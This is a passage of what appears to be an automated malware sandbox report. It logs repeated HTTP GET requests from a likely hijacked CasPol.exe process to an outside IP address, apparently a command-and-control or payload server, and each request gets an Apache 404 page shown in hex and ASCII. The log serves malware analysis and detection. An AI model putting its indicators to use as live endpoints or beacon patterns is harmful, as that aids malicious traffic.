                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:51.810159922 CET530INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:51.810324907 CET530INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:51.810340881 CET531INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:51.810353994 CET531INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    43192.168.11.204987237.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:24:01.843806982 CET556OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:24:01.929733038 CET557INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:24:01 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:24:01.929783106 CET557INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:24:01.929805994 CET558INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:24:01.929902077 CET558INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:24:01.929923058 CET558INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    44192.168.11.204987337.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:24:11.964451075 CET559OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:24:12.030263901 CET559INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:24:11 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:24:12.030352116 CET560INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:24:12.030412912 CET560INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:24:12.030468941 CET560INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:24:12.030525923 CET560INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    45192.168.11.204987437.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:24:22.055651903 CET561OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:24:22.127638102 CET562INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:24:22 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:24:22.127703905 CET562INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:24:22.127751112 CET562INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:24:22.127794027 CET563INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:24:22.127840042 CET563INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    5192.168.11.204980437.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:17:37.362966061 CET207OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:37.437429905 CET207INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:37 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:37.437498093 CET208INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:37.437544107 CET208INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:37.437587023 CET208INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:37.437632084 CET208INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    6192.168.11.204980537.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:17:47.469768047 CET209OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:47.492672920 CET210INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:47 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:47.492774963 CET210INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:47.492829084 CET211INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:47.492837906 CET211INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:47.492846966 CET211INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    7192.168.11.204980637.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:17:57.530489922 CET212OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:57.574198008 CET213INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:57 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:57.574271917 CET213INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:57.574321985 CET213INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
